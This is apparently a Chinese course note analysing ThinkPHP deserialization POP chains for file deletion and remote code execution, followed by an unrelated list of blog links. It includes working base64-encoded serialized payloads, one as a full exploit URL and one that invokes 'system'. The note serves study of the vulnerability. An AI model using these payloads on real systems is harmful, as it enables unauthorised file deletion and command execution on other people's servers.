DAY111PHP开发框架&THIKNPHP&反序列化&POP利用链&RCE执行&文件删除

一、文件删除利用链分析

1、__destruct发现调用$this->removeFiles();

2、removeFiles();函数方法file_exists,@unlink($filename);文件删除功能

3、unserialize(base64_decode($_GET'id'));

有可控变量

4、pop文件删除利用链的使用

只有在这个类中调用

Files可控数组

5、Poc实现

路由关系

application/index/controller/Index.php

http://tp-serilize/index.php/index/index/unser?id=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtzOjg6ImQ6XDEudHh0Ijt9fQ==

6、动态调试

二、RCE利用链分析

1、动态调试分析

TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo2OiJjb2xlYWsiO2E6MTp7aTowO3M6MDoiIjt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NjoiY29sZWFrIjtPOjEzOiJ0aGlua1xSZXF1ZXN0Ijo1OntzOjc6IgAqAGhvb2siO2E6MTp7czo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjg7aToxO3M6NjoiaXNBamF4Ijt9fXM6OToiACoAZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fXM6MTM6IgAqAG1lcmdlUGFyYW0iO2I6MTtzOjg6IgAqAHBhcmFtIjthOjE6e2k6MDtzOjc6Im5vdGVwYWQiO31zOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fX19fX19

从下到上的利用链利用

1、文件删除poc-》rce利用

//__destruct->removeFiles->file_exists->

$filename未对象时候触发__toString

2、__toString利用链分析

//$relation可控,找到一个没有visible方法或不可访问这个方法的类时,即可调用_call()魔法方法

3、call利用链分析

hook$method, $args

-》method, args

4、逆向分析call_user_func

filterValue

5、input方法触发分析

6、param被谁触发

被isAjax触发了

7、call方法调用了

8、利用链不会xie

相关推荐
遨游DATA8 分钟前
Spring Boot 启动失败排查:如何区分多 Bean 冲突与清理阶段异常
java·spring boot·后端
从零开始的代码生活_43 分钟前
C++ 内存管理:从内存分区到 new/delete 底层原理
开发语言·c++·后端
wabs6661 小时前
关于单调栈【力扣739.每日温度的思考】
java·开发语言
AOwhisky1 小时前
Python 学习笔记(第三期)——流程控制核心知识点自测与详解
开发语言·笔记·python·学习·云原生·运维开发·流程控制
雪碧聊技术1 小时前
为什么要学函数式编程?
java·函数式编程
2601_957174651 小时前
零基础学网络安全能学好吗
安全·web安全
aaPIXa6222 小时前
C++ 用 13 条规则让模型写出安全现代 C++
java·c++·安全
逆向编程2 小时前
Socket异常连接自动清理方案
开发语言
2601_949817723 小时前
C++指针与引用深度精讲:底层原理、差异对比与高阶实战陷阱
java·jvm·c++
va学弟3 小时前
Java 网络通信编程(10):Channel 和 Selector
java·开发语言